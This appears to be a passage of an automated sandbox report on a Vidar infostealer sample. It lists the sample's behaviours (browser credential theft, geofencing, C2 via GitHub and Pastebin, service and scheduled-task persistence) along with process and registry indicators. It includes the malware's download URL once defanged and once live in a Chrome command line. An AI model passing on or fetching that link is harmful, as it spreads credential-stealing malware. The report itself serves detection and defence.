vidar | hxxps://download2346[.]mediafire[.]com/7y0s9a4nygpg9Hlz64qwpKgpVQD43YfY3SkmgpFTrLOc8YXsvhK9TUfyMneb1cj_CYasLOLoo0COneZnz4cps5AenPk8SUZo-o08fJfaTgHS-krPRg_9KDVnRaGnYpYXWYcDImZTv0r1CmhcbWj4q_uhQTUbZN_xJEach-Ac6iux8A/stl2fcuf5yxabl8/I%D0%B0uncher_v9[.]1[.]rar

pid	Process
4004	chrome.exe
3512	chrome.exe
5776	chrome.exe
5164	msedge.exe
824	chrome.exe
4700	chrome.exe
1512	chrome.exe
5976	chrome.exe
2380	msedge.exe
4372	chrome.exe
1736	chrome.exe
2304	chrome.exe
2644	chrome.exe
2348	chrome.exe
3920	chrome.exe
5492	chrome.exe
2524	msedge.exe
5508	msedge.exe
1844	msedge.exe
6116	chrome.exe
3776	chrome.exe
1244	chrome.exe
2600	chrome.exe
5384	msedge.exe
5040	chrome.exe
6064	chrome.exe
5868	chrome.exe
2544	chrome.exe
2276	chrome.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\Control Panel\International\Geo\Nation	S0FTWARE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\Control Panel\International\Geo\Nation	lkmqbmmk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\Control Panel\International\Geo\Nation	S0FTWARE.exe

Executes dropped EXE 5 IoCs

pid	Process
5544	S0FTWARE.exe
5148	ejthkcxxlz.exe
4168	lkmqbmmk.exe
5072	S0FTWARE.exe
5512	kfwttlf.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 24 IoCs

Web Service

T1102

flow	ioc
431	raw.githubusercontent.com
444	raw.githubusercontent.com
469	pastebin.com
677	raw.githubusercontent.com
678	raw.githubusercontent.com
681	raw.githubusercontent.com
408	raw.githubusercontent.com
426	raw.githubusercontent.com
626	raw.githubusercontent.com
656	raw.githubusercontent.com
391	raw.githubusercontent.com
398	raw.githubusercontent.com
612	raw.githubusercontent.com
616	raw.githubusercontent.com
634	raw.githubusercontent.com
638	raw.githubusercontent.com
661	raw.githubusercontent.com
708	raw.githubusercontent.com
468	pastebin.com
613	raw.githubusercontent.com
688	raw.githubusercontent.com
709	raw.githubusercontent.com
620	raw.githubusercontent.com
392	raw.githubusercontent.com

Power Settings 1 TTPs 32 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3004	powercfg.exe
5972	powercfg.exe
3732	powercfg.exe
6016	powercfg.exe
1840	powercfg.exe
5316	powercfg.exe
5512	powercfg.exe
4124	powercfg.exe
3104	powercfg.exe
2624	powercfg.exe
5892	powercfg.exe
3740	powercfg.exe
3252	powercfg.exe
4124	powercfg.exe
2004	powercfg.exe
4836	powercfg.exe
5940	powercfg.exe
2960	powercfg.exe
3348	powercfg.exe
756	powercfg.exe
5608	powercfg.exe
640	powercfg.exe
2976	powercfg.exe
5588	powercfg.exe
5068	powercfg.exe
864	powercfg.exe
5228	powercfg.exe
388	powercfg.exe
2072	powercfg.exe
2528	powercfg.exe
6052	powercfg.exe
5356	powercfg.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4592-783-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-786-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-789-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-795-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-792-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-791-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-794-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-793-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-787-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-788-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-785-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-784-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-1545-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4592-1544-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Launches sc.exe 50 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5640	sc.exe
2352	sc.exe
4088	sc.exe
3532	sc.exe
3688	sc.exe
5828	sc.exe
2600	sc.exe
3336	sc.exe
3040	sc.exe
3012	sc.exe
4568	sc.exe
5176	sc.exe
2352	sc.exe
4492	sc.exe
5404	sc.exe
3144	sc.exe
5832	sc.exe
5532	sc.exe
4144	sc.exe
5328	sc.exe
1996	sc.exe
3008	sc.exe
5336	sc.exe
3204	sc.exe
776	sc.exe
3144	sc.exe
5984	sc.exe
5860	sc.exe
4316	sc.exe
1696	sc.exe
6052	sc.exe
1668	sc.exe
4628	sc.exe
5884	sc.exe
1628	sc.exe
2240	sc.exe
3692	sc.exe
5316	sc.exe
3836	sc.exe
5380	sc.exe
2560	sc.exe
5680	sc.exe
1452	sc.exe
5860	sc.exe
692	sc.exe
1316	sc.exe
4456	sc.exe
1972	sc.exe
2148	sc.exe
5356	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ejthkcxxlz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lkmqbmmk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kfwttlf.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ejthkcxxlz.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ejthkcxxlz.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3952	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896497173046238"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000_Classes\Local Settings	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2188	schtasks.exe
6052	schtasks.exe
4880	schtasks.exe
2052	schtasks.exe
3248	schtasks.exe
5984	schtasks.exe
5472	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
224	chrome.exe
224	chrome.exe
3004	powershell.exe
3004	powershell.exe
3004	powershell.exe
5920	powershell.exe
5920	powershell.exe
5920	powershell.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
5124	powershell.exe
5124	powershell.exe
5124	powershell.exe
5148	ejthkcxxlz.exe
5148	ejthkcxxlz.exe
224	chrome.exe
224	chrome.exe
5924	powershell.exe
5924	powershell.exe
5924	powershell.exe
5288	powershell.exe
5288	powershell.exe
5288	powershell.exe
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe
5148	ejthkcxxlz.exe
5148	ejthkcxxlz.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5168	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe
Token: SeShutdownPrivilege	224	chrome.exe
Token: SeCreatePagefilePrivilege	224	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
5168	7zFM.exe
5168	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe
224	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 4988	224	chrome.exe	89
PID 224 wrote to memory of 4988	224	chrome.exe	89
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2428	224	chrome.exe	90
PID 224 wrote to memory of 2256	224	chrome.exe	91
PID 224 wrote to memory of 2256	224	chrome.exe	91
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92
PID 224 wrote to memory of 3144	224	chrome.exe	92

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download2346.mediafire.com/7y0s9a4nygpg9Hlz64qwpKgpVQD43YfY3SkmgpFTrLOc8YXsvhK9TUfyMneb1cj_CYasLOLoo0COneZnz4cps5AenPk8SUZo-o08fJfaTgHS-krPRg_9KDVnRaGnYpYXWYcDImZTv0r1CmhcbWj4q_uhQTUbZN_xJEach-Ac6iux8A/stl2fcuf5yxabl8/I%D0%B0uncher_v9.1.rar
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1972,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1968 /prefetch:2
  2⤵
  PID:2428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  PID:2256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2332 /prefetch:8
  2⤵
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:4104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4380,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4428 /prefetch:2
  2⤵
  PID:1008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4952,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5188 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4920,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:4256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5516,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3340 /prefetch:8
  2⤵
  PID:2560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3176,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:1784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4892,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:1316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5812,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4900 /prefetch:1
  2⤵
  PID:2104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4932,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:1452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5960,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6152,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6156 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6332,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6504,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6520 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6780,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6860,i,17848059080457048739,16453787486304174697,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:5368
- C:\Program Files\Google\Chrome\Application\chrome.exe
